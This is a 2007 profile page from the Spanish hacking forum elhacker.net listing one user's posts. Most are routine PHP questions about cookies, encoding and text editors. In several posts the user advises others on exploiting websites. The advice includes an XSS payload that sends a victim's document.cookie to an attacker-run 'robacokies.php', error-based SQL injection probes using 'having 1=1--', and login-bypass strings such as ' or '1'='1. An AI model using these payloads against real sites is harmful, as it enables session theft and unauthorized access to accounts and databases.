elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6
31  Foros Generales / Foro Libre / Re: Edad Promedio de Usuarios del Foro. en: 20 Julio 2007, 17:26 pm
20 años :xD todavia
....mmm los t´s..
32  Seguridad Informática / Nivel Web / Re: xss encontrado en web(como sacar provecho?) en: 20 Julio 2007, 17:18 pm
Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes

SAludos
33  Seguridad Informática / Nivel Web / Re: xss encontrado en web(como sacar provecho?) en: 20 Julio 2007, 01:15 am
Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link

Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos
34  Programación / PHP / Re: Editor de texto en php en: 19 Julio 2007, 02:56 am
Muchas gracias ;D
35  Programación / PHP / Editor de texto en php en: 19 Julio 2007, 01:37 am
Hola de nuevo, tengo una duda, en mi página quiero poner para mi comodidad y de los que agreguen noticias además para hacerlo seguro poner un editor de texto como el de los foros, como el que estoy usando en este momento, con lenguaje bbcode o parecido,  mas o menos tengo una idea de como hacerlo pero creo que es muy complicado para hacerlo por el momento y me gustaría saber si existe algun tipo de proyecto open source o parecido que tenga el código ya hecho y que se pueda adaptar a mi página ya que he visto páginas que no son blogs ni nada por el estilo que tienen editores así.

Saludos ;D
36  Programación / PHP / Re: setcookie php en: 17 Julio 2007, 18:28 pm
No importa cual dominio le pnga, ni si el servidor donde lo pruebo es local o el que tengo, de todas maneras no acepta ese parametro, quiza sea una restriccion del navegador para que no te metas cookies de otro sitio o del mismo php
Saludos
37  Programación / PHP / setcookie php en: 13 Julio 2007, 19:22 pm
HOla que tal, estoy teniendo un problema con la funcion setcookie() en php solo em funciona si no pogo dominio, es decir si lo pongo asi:
setcookie($nombre,$valor,$tiempo_vida,$path);
funciona perfectamente y le asigna solo el dominio(el de mi servidor) pero a la hora de poner un dominio cualquiera: setcookie($nombre,$valor,$tiempo_vida,$path,$dominioX); no funciona

Por que puede ser, habra forma de resolverlo

Saludos :D

otra pequeña pregunta, ayer puse una pregunta sobre como saber la carpeta base de un pagina referente, pero em lo borraron, no creo haber fallado de ninguna forma en las reglas del foro, por que pudo haber sido?
38  Seguridad Informática / Nivel Web / Re: inquietud SQL Injection en ASP en: 10 Julio 2007, 21:48 pm
Bueno yo tambien tengo unos problemitas con la inyeccion de codigos resulta k pongo en el login y el password de una pagina asp esto login: ''or '1'=' y en el pass: ''or '1'=' lo mismo y me da el siguiente error:
en el lgin deberias poner
' or '1'='1
lo que dices que pusiste es incorrecto:
imagina la cadena sql:
SELECT * FROM ususario WHERE user='' or '1'='1' AND....
nota como la cadena es valida todos lso comillas se cierran correctamente en cambio con lo que tu envias no:
SELECT * FROM ususario WHERE user='''or '1'=' ' AND....

tambien pruedes probar el ya clasico
' or 1=1--
SELECT * FROM ususario WHERE user=''or 1=1 -- ' AND (todo esto se vuelve comentario)....
39  Programación / PHP / Re: Evitar "signo de interrogacion" con caracteres ...¿raros? en: 5 Julio 2007, 20:57 pm
Si efectivamente como dice si lance son muchos caracteres los que hya que remplazar pero ya lo logre sin tener que ahcer eso solo puse en la cabezera el sigueitne codigo:

Código:
<?php header('Content-Type: text/html; charset=ISO-8859-1'); ?>

Saludos ;D
40  Programación / PHP / Evitar "signo de interrogacion" con caracteres ...¿raros? en: 5 Julio 2007, 04:58 am
Hola que tal, siento el titulo no se me ocurrio como expresar la idea, este es el problema, quizá ya mcuhos han tenido el problema de que al poner n caracter como á ñ é y muchos caracteres por alguna razón el exploradro de internet no los lee y pone en vez de eso un signo de interrogación, para evitar esto claro se pone con su "entidad" o entity por ejemplo para el apostrife sería     &#39;, el problema es que tengo una base de datos de noticias en las que seria muy complicado estar cambiado cada valor por su representación de esta forma, claro usaría una funcion para hacerlo que para mi no seria lo ideal, lo que quiero saber es si existe una función en php que haga esto por mí o alguna forma de que logre que le explorador reconozca este tipo de caracteres

Saludos!
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines